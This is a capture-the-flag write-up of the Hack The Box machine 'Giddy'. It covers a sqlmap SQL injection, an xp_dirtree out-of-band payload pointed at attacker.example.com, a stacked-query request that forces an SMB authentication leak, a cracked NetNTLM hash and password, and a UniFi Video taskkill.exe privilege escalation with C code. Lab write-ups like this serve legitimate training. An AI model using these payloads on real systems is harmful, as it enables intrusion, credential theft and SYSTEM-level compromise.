Writeup: Hack The Box - Giddy
Description
- Name:
giddy
- IP:
10.10.10.104
- Author:
lkys37en
- Difficulty:
6.2/10
Discovery
nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.104PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_ssl-date: 2018-09-14T07:59:14+00:00; +14s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2018-06-16T01:04:03
|_Not valid after: 2018-12-16T01:04:03
|_ssl-date: 2018-09-14T07:59:15+00:00; +14s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s301 - 147B - /mvc -> http://10.10.10.104/mvc/
302 - 157B - /Remote -> /Remote/default.aspx?ReturnUrl=%2fRemote
302 - 157B - /remote -> /Remote/default.aspx?ReturnUrl=%2fremote
Pwn
On /remote,
port 443, there is a login for a Windows Powershell Web Access service.
In /mvc
there is a not-production ready store application.
Using sqlmap
on the store page we immediately found out that it is vulnerable to SQLi.
sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=8" --threads 10 --random-agent --level 5 --risk 3 --dbms=mssql
Port 3389 and 5985 are used for RDP and Windows Remote Management (WinRM) but we don’t have any credentials to use.
From the sqlmap
we can investigate if there are any credentials on the Injection
DB or in the master
DB used by the store: not a single hash was found (not a shell).
Searching for a way to read files in the remote file system we found that mssql
has a stored procedure to display a list of subdirectories: xp_dirtree.
EXEC master.sys.exp_dirtree 'C:\Users\stacy\Desktop\',0,1;
.
Executing this command did not produced any output so we searched for other uses of the xp_dirtree
function: Out of Band Exploitation.
This is a concept that can be used when exploiting lots of vulnerabilities such as SQLi, Command Injection, Cross-Site Scripting and XML Eternal Entity Injection.
The idea is fairly simple: instead of capturing the data you would like to retrieve and extract it though Boolean-logic, you can request the system to transmit the data over a protocol such as HTTP, SMB or DNS.
With a SQL Injection to perform this kind of exfiltration we can use functions such as:
MSSQL: master..xp_dirtree
MySQL: LOAD_FILE()
Supplying a hostname to these functions will cause a DNS lookup to occur; if you control the authoritative name server for a domain then you could see this DNS request in the logs of your server. Now at this to the fact that you can dynamically generate the hostname that is to be used, meaning you can smuggle data out in the subdomain of a domain that you control. A point to note though, is that hostnames have restrictions on the types of characters and the lengths of queries, so we recommend combining functions like SUBSTR() and HEX() to ensure that the length does not exceed the maximum allowed in subdomains and hex will encode any characters that cannot be used in a hostname.
So an example of the most simple payload would be:
EXEC master..xp_dirtree '\\attacker.example.com\foo' --
This would cause a DNS lookup to attacker.example.com
if the system is vulnerable.
In out scenario we cannot use DNS exfiltration because the machine cannot interact to an external domain and with the IP is not possible to perform a UDP request like exfiltrateddata.10.10.10.10
; it’s possible to use xp_dirtree
to perform a SMBauthentication request though.
We can’t perform a SMB Relay Attack (CVE-2015–0005) since the machine will not get the payload for the reverse shell.
The web-store is vulnerable to stacked queries injection so we can trigger the authentication from Giddy to out machine using impacket
(smbserver.py DODO .
) and run:
GET /mvc/Product.aspx?ProductSubCategoryId=26;EXEC(%27master..xp_dirtree%20%22\\10.10.XX.XX\c$%22%27); HTTP/1.1
Host: 10.10.10.104
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
The authentication token from Stacy via SMB is:
STACY::GIDDY:4141414141414141:1180c58d21933073c98f307c65ea41a1:0101000000000000007265a3de4dd40167ae4f38230da87400000000010010004f004300470041004d00540069004c00020010007a0061006c00780065006a006c007900030010004f004300470041004d00540069004c00040010007a0061006c00780065006a006c00790007000800007265a3de4dd4010600040002000000080030003000000000000000000000000030000023128d4c0270edac6f1a291e9f7f831e122acbee8d0ff5c82a5e415c1f13611e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0039003500000000000000000000000000
Cracking the NTLM hash with hashcat (option -m 400
) we got that Stacy’s password is xNmWo6272k7x.
Loggin in on the /remote
endpoint we got an interactive powershell session and the first flag.
We tried to upgrade the shell to a meterpreter session but the machine has Windows Defender enabled and Powershell is in Constrained Mode (without Powershell version 2 enabled).
PS C:\Users\Stacy\Downloads>$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
In C:\Users\Stacy\Documents
we saw a file called unifivideo
: Unifi Video is a Ubiquiti service used to control and access video survelliance from remote. The installation path is in C:\ProgramData\unifi-video
and from data\system.properties
we read the software version:
# unifi-video v3.7.3
#Sat Jun 16 21:58:13 EDT 2018
is_default=false
uuid=e79d440a-62cd-4274-95c3-d746cbb3b817
# app.http.port = 7080
# app.https.port = 7443
# ems.liveflv.port = 6666
# ems.livews.port = 7445
# ems.livewss.port = 7446
# ems.rtmp.enable = true
# ems.rtmp.port = 1935
# ems.rtsp.enable = true
# ems.rtsp.port = 7447
From exploitdb we found a privilege escalation exploit for that version.
Ubiquiti UniFi Video for Windows is also shipped with a service called Ubiquiti UniFi Video. Its executable avService.exe is placed in the same directory and also runs under the NT AUTHORITY/SYSTEM account.
However the default permissions on the installation folder are inherited from the parent folder and are not explicitly overridden, which allows all users, even unprivileged ones, to append and write files to the application directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe.
However this file does not exist in the application directory by default at all.
By copying an arbitrary taskkill.exe
to the directory as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM
.
Initially we wrote a C program in Windows to copy the flag in a Stacy readable folder:
#include <stdio.h>
FILE *stream, *stream2;
int main(void) {
errno_t err;
char list[50];
err = fopen_s(&stream, "C:\\Users\\Administrator\\Desktop\\root.txt", "r");
if (err != 0) {
printf("The file root.txt was not opened\n");
return -1;
}
err = fopen_s(&stream2, "C:\\Users\\Stacy\\Desktop\\output.txt", "w+");
if (err != 0) {
printf("The file output.txt was not opened\n");
fclose(stream);
return -1;
}
fread(list, 50, 1, stream);
printf("Contents of root.txt = %.50s\n", list);
fprintf(stream2, list);
fclose(stream);
fclose(stream2);
return 1;
}
Using Stop-Service
and Start-Service
for Ubiquiti UniFi Video we triggered the execution of the uploaded taskkill
file to read the root flag!
We can also use some AV evasion technique to execute a meterpreter session.